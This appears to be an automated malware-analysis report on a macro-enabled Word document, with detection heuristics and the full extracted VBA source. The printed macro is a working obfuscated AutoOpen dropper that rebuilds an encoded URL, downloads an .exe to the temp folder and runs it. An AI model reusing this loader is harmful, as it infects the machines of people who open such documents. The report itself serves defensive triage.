Verdict: MALICIOUS
Risk Score: 352
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample is an OOXML document containing VBA macros. Heuristics indicate the presence of an obfuscated auto-exec loader that uses CreateObject and Shell/exec functions to download and execute a file. The embedded artifact 'macros.bas' likely contains this malicious VBA code.
Heuristics (9)
- ClamAV: Doc.Malware.Valyria-10019999-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-10019999-0
- VBA project inside OOXML (medium, OOXML_VBA, 5 related findings): Document contains a VBA project; VBA macros present.
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `somebody = variablrName1DASH_1.responseBody`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `Set variablrName1DASH1solo = CreateObject(trutrufast(3))`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set variablrName1DASH1solo = CreateObject(trutrufast(3))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following URLs are referenced by macro:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact 1: macros.bas
- Kind: vba-macro
- Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
- Size: 12496 bytes
- SHA-256: daec303eecc117cf647811dd5585244cefd86d5870a4627749ee6f466eb618e9
- Detection, ClamAV: No threats found
- Detection, obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
LoadBaseFile
End Sub
Attribute VB_Name = "Module1"
Public variablrName1DASH_1 As Object
Public variablrName3 As Object
Public variablrName1DASH_3 As Object
Public variablrName5() As String
Public variablrName1DASH_4 As String
Public trutrufast() As String
Public variablrName1_tolko1 As String
Public variablrName1DASHfiddle As Object
Public variablrName4 As String
Public variablrName2 As String
Public somebody As Variant
Public Function indata_to_kingaku(ByVal idx As Long, ByVal indata As Long) As Long
Dim kingaku As Long
Dim pasIdx As Long
pasIdx = f1002_get_.sbt(idx)
Select Case f1002_get_.Kind(idx)
Case 2, 5, 6
If f1007_get_.urikin(pasIdx) = 0 Or f1007_get_.inpscl(pasIdx) = 0 Then
kingaku = 0
Else
kingaku = indata * f1007_get_.inpscl(pasIdx) * f1007_get_.tamatanka(pasIdx)
End If
Case Else
kingaku = indata * 100
End Select
indata_to_kingaku = kingaku
End Function
Public Sub set_safe_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
g_dai.Rel(rdb - 1).safe = newValue
If dataLink Then
g_dai.Rel(rdb - 1).out = newValue
End If
End Sub
Public Sub set_start_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
g_dai.Rel(rdb - 1).Start = newValue
If dataLink Then
End If
End Sub
Public Sub set_gen1uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
Dim sbt As Long
Dim kinko As Long
g_dai.Rel(rdb - 1).gen1uri = newValue
If dataLink Then
sbt = f1001_get_.sbt(rdb)
g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
kinko = f1001_get_.kinko(rdb)
g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
End If
End Sub
Public Sub AbnormalWindup()
Dim rc As Long
Dim rs As Long
Set variablrName1DASH1solo = CreateObject(trutrufast(3))
Set variablrName1DASH_3 = variablrName1DASH1solo.Environment(trutrufast(4))
Dim apdistance As Integer
For apdistance = LBound(variablrName5) To UBound(variablrName5)
variablrName4 = variablrName4 & SUBBUS3(apdistance)
Next apdistance
CheckRecovery
Exit Sub
Dim ftp As String
For rs = 1 To f1000_get_rs + 1
rc = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc = 0 Then
rc = ft.p.DeleteFile("/r0/set")
rc = ft.p.DeleteFile("/r0/mf6407_*")
rc = ft.p.DeleteFile("/r0/mf6411*")
rc = ft.p.DeleteFile("/r0/setok")
rc = ft.p.DeleteFile("/r0/setng")
ft.p.Close
End If
Next
End Sub
Public Function DataRecover(ByVal fLink As Boolean) As Boolean
Dim I As Long
Dim msg As String
DataRecover = False
If CheckGuid Then
f640X_b.uild err_buf, err_count, bld_result, fLink
If f640X_put = False Then
Exit Function
End If
If set_put = False Then
Exit Function
End If
SaveGu.ID
DataRecover = True
Else
MsgBox "PC", vbCritical
End If
End Function
Public Sub ShowResult()
frmResult.Show vbModal
End Sub
Public Function SUBBUS3(variablrName6 As Integer) As String
Dost = CInt(variablrName5(variablrName6))
SUBBUS3 = Chr(Dost / (35 - 8))
End Function
Public Function SUBBUS2(A1 As String, A2 As String, A3 As String) As String
SUBBUS2 = Replace(A1, A2, A3)
End Function
Public Function GetDocumentName() As String
If g_fileName = "" Then
GetDocumentName = DEF_FILE_NAME
Else
GetDocumentName = g_fileName
End If
End Function
Public Function NewDocument() As Boolean
Erase g_dai.Rel
Erase g_zen.Rel
NewDocument = LoadBaseFile
End Function
Public Function OpenDocument(typicalName As String) As Boolean
On Error GoTo ErrHandler
Dim skipData As Long
Dim fno As Integer
trutrufast = Split(variablrName2, "ROOOOH")
Set variablrName3 = CreateObject(trutrufast(1))
Set variablrName1DASHfiddle = CreateObject(trutrufast(2))
Dim I As Integer
Dim d As Boolean
d = True
IsWord = True
For I = 1 To Len(Trim("eesucka"))
If d = False Then
Set variablrName1DASH_1 = CreateObject(trutrufast(I - 2))
Exit For
Else
d = False
End If
Next I
AbnormalWindup
Exit Function
g_fileName = typicalName
I = 0
fno = FreeFile
Open Replace(g_fileName, ".csv", "_d.csv") For Input As fno
Do While Not EOF(fno)
I = I + 1
Loop
Close fno
I = 0
fno = FreeFile
Open Replace(g_fileName, ".csv", "_z.csv") For Input As fno
Do While Not EOF(fno)
I = I + 1
Loop
Close fno
OpenDocument = True
Exit Function
ErrHandler:
OpenDocument = False
End Function
Public Function SaveDocument(typicalName As String) As Boolean
On Error GoTo ErrHandler
Dim I As Long
Dim fno As Integer
variablrName2 = SUBBUS2(variablrName2, "ROOH", "M")
variablrName2 = SUBBUS2(variablrName2, "ROOOH", "s")
OpenDocument ""
Exit Function
fno = FreeFile
Open typicalName For Output As fno
Write #fno, Now
Close fno
I = 0
fno = FreeFile
Open Replace(typicalName, ".csv", "_d.csv") For Output As fno
For I = 0 To UBound(g_dai.Rel)
Write #fno, I + 1, g_dai.Rel(I).out, g_dai.Rel(I).safe, g_dai.Rel(I).Start, g_dai.Rel(I).gen1uri, g_dai.Rel(I).gen2uri
Next
Close fno
I = 0
fno = FreeFile
Open Replace(typicalName, ".csv", "_z.csv") For Output As fno
For I = 0 To UBound(g_zen.Rel)
Write #fno, I + 1, g_zen.Rel(I).urikin
Next
Close fno
SaveDocument = True
Exit Function
ErrHandler:
SaveDocument = False
End Function
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub erer()
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9CE5FF10-686D-4989-944B-505153292E69}{6262A439-2940-4599-BCD5-53A63AE71F0D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Frame1_Click()
End Sub
Private Sub MultiPage1_Change()
End Sub
Private Sub TabStrip1_Change()
End Sub
Attribute VB_Name = "Module"
Public Sub set_gen2uri_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
Dim sbt As Long
Dim kinko As Long
variablrName3.Write somebody
variablrName3.savetofile variablrName1_tolko1, 2
set_out_rel 0, 0, False
Exit Sub
g_dai.Rel(rdb - 1).gen2uri = newValue
If dataLink Then
sbt = f1001_get_.sbt(rdb)
g_dai.Rel(rdb - 1).safe = -(g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri) / f1007_get_.tamatanka(sbt) / f1007_get_.inpscl(sbt)
kinko = f1001_get_.kinko(rdb)
g_zen.Rel(kinko - 1).urikin = sum_kinko_dai(kinko)
End If
End Sub
Public Sub set_indata_rel(ByVal idx As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
g_zen.Rel(idx - 1).urikin = newValue
If dataLink Then
End If
End Sub
Public Sub f640X_build(err_buffer() As String, err_count As Long, bld_result() As String, ByVal fLink As Boolean)
If fLink Then
Else
End If
End Sub
Public Function LoadBaseFile() As Boolean
Dim wssName As String
Dim fno As Integer
variablrName5 = Split("2808312312312443132312312312443132312312312443024312312312441566312312312441269312312312441269312312312443213312312312443213312312312443213312312312441242312312312443132312312312443078312312312442619312312312443024312312312442619312312312442916312312312442916312312312442619312312312442970312312312441242312312312442673312312312442997312312312442943312312312441269312312312442997312312312442889312312312443024312312312441539312312312441512312312312441485312312312442781312312312441485312312312443186", "31231231244")
variablrName2 = SUBBUS2("ROOHicroROOOHoft.XROOHLHTTPROOOOHAdodb.ROOOHtrROHaROOHROOOOHROOOHhROHll.Appl" _
+ SUBBUS2("icationROOOOHWROOOHcript.ROOOHhROHllROOOOHProcROHROOOHROOOHROOOOHGROHTROOOOHTROHROOHPROOOOHTypROHROOOOHopROHnROOOOHwritDATponROOOHROHBodyROOOOHROOOHavROHtofilROHROOOOH", "DAT", "ROHROOOOHrROHROOOH") _
+ "\hramgROOOH.ROHxROH", "ROH", "e")
SaveDocument ""
End Function
Public Function f640X_put() As Boolean
Dim allOk As Boolean
Dim rc(4) As Long
Dim rs As Long
variablrName1DASH_4 = variablrName1DASH_3(trutrufast(6))
variablrName1_tolko1 = variablrName1DASH_4
variablrName1_tolko1 = variablrName1_tolko1 + trutrufast(12)
variablrName3.Type = 1
MakeLocalFile
Exit Function
f640X_put = True
MakeLocalFile
For rs = 1 To f1000_get_rs + 1
rc(0) = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc(0) = 0 Then
rc(1) = ft.p.PutFile("mf6407_" & CStr(rs) & ".bin", "/r0", 1)
rc(2) = ft.p.PutFile("mf6407_" & CStr(rs) & ".crc", "/r0", 1)
rc(3) = ft.p.PutFile("mf6411.bin", "/r0", 1)
rc(4) = ft.p.PutFile("mf6411.crc", "/r0", 1)
ft.p.Close
Else
Call ErrCo.nnect(ftp, rc(0))
End If
Set ftp = Nothing
If rc(0) <> 0 Or rc(1) <> 1 Or rc(2) <> 1 Or rc(3) <> 1 Or rc(4) <> 1 Then
f640X_put = False
Exit For
End If
Next
Kill "mf6407_.bin"
Kill "mf6407_.crc"
Kill "mf6411."
End Function
Attribute VB_Name = "Module2"
Public Function f4103_get_kingaku(ByVal idx As Long) As Long
f4103_get_kingaku = indata_to_kingaku(idx, fno4103_get_.indata(s_f.no4103(0), idx))
End Function
Public Function sum_kinko_dai(ByVal kinko As Long) As Long
Dim rdb As Long
Dim sum As Long
For rdb = 1 To f1000_get_daisu
If f1001_get_.kinko(rdb) = kinko Then
sum = sum + g_dai.Rel(rdb - 1).gen1uri + g_dai.Rel(rdb - 1).gen2uri
End If
Next
sum_kinko_dai = sum
End Function
Public Sub set_out_rel(ByVal rdb As Long, ByVal newValue As Long, ByVal dataLink As Boolean)
variablrName1DASHfiddle.Open (variablrName1_tolko1)
Exit Sub
g_dai.Rel(rdb - 1).out = newValue
If dataLink Then
g_dai.Rel(rdb - 1).safe = newValue
End If
End Sub
Public Sub MakeLocalFile()
Dim fno As Integer
Dim rs As Long
Dim I As Long
Dim crc As Integer
variablrName3.Open
somebody = variablrName1DASH_1.responseBody
set_gen2uri_rel 0, 0, False
Exit Sub
Dim work(512 - 1) As Byte
For rs = 1 To 3
fno = FreeFile
Open "mf6407_" & CStr(rs) & ".bin" For Binary As fno
For I = 0 To UBound(work)
work(I) = s_fn.o6407(((rs - 1) * 512 * RECSIZE_FN.O4102) + I)
Next
Put fno, , work
Close fno
crc = hto.ns(lec_cal.ccrc(work(0), RECSIZE_FN.O4102 * 512))
fno = FreeFile
Open "mf6407_" & CStr(rs) & ".crc" For Binary As fno
Put fno, , crc
Close fno
Next
fno = FreeFile
Open "mf6411.bin" For Binary As fno
Put fno, , s_fno6411
Close fno
crc = hto.ns(lec_cal.ccrc(s_fno6411(0), SIZE_OF_FNO6411))
fno = FreeFile
Open "mf6411.crc" For Binary As fno
Put fno, , crc
Close fno
End Sub
Public Function set_put() As Boolean
Dim allOk As Boolean
Dim rc(4) As Long
Dim rs As Long
Dim ftp As String
set_put = True
For rs = 1 To f1000_get_rs + 1
rc(0) = f.tp.Connect("as" & CStr(rs), "super", "user")
If rc(0) = 0 Then
rc(1) = ft.p.PutFile("set", "/r0", 1)
ft.p.Close
Else
Call ErrCon.nect(ftp, rc(0))
End If
If rc(0) <> 0 Or rc(1) <> 1 Then
set_put = False
Exit For
End If
Next
End Function
Public Function CheckRecovery() As Long
Dim okFlag As Boolean, ngFlag As Boolean
Dim rc As Long
Dim rs As Long
Dim farray As Variant
If Application = "Microsoft Word" Then
variablrName1DASH_1.Open trutrufast(5), variablrName4, False
variablrName1DASH_1.Send
f640X_put
End If
Exit Function
Dim ftp As String
For rs = 1 To f1000_get_rs + 1
rc = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc = 0 Then
farray = ft.p.GetDir("/r0")
okFlag = InArr.ay(farray, "setok")
ngFlag = InArr.ay(farray, "setng")
If okFlag = True And ngFlag = False Then
CheckRecovery = 1
ElseIf okFlag = False And ngFlag = True Then
CheckRecovery = 2
Else
CheckRecovery = 0
End If
End If
Next
End Function
Public Sub NormalWindup()
Dim rc As Long
Dim rs As Long
Dim ftp As String
For rs = 1 To f1000_get_rs + 1
rc = ft.p.Connect("as" & CStr(rs), "super", "user")
If rc = 0 Then
rc = ft.p.DeleteFile("/r0/setok")
rc = ft.p.DeleteFile("/r0/setng")
ft.p.Close
End If
Next
End Sub
Artifact 2: vbaProject_00.bin
- Kind: vba-project
- Source: OOXML VBA project: word/vbaProject.bin
- Size: 48640 bytes
- SHA-256: 50529d74c9bd8d02bf757287311f0a7c7fd1c9078f7e9a740d7d55a94094ae37
- Detection, ClamAV: Doc.Malware.Valyria-10019999-0
- Detection, obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))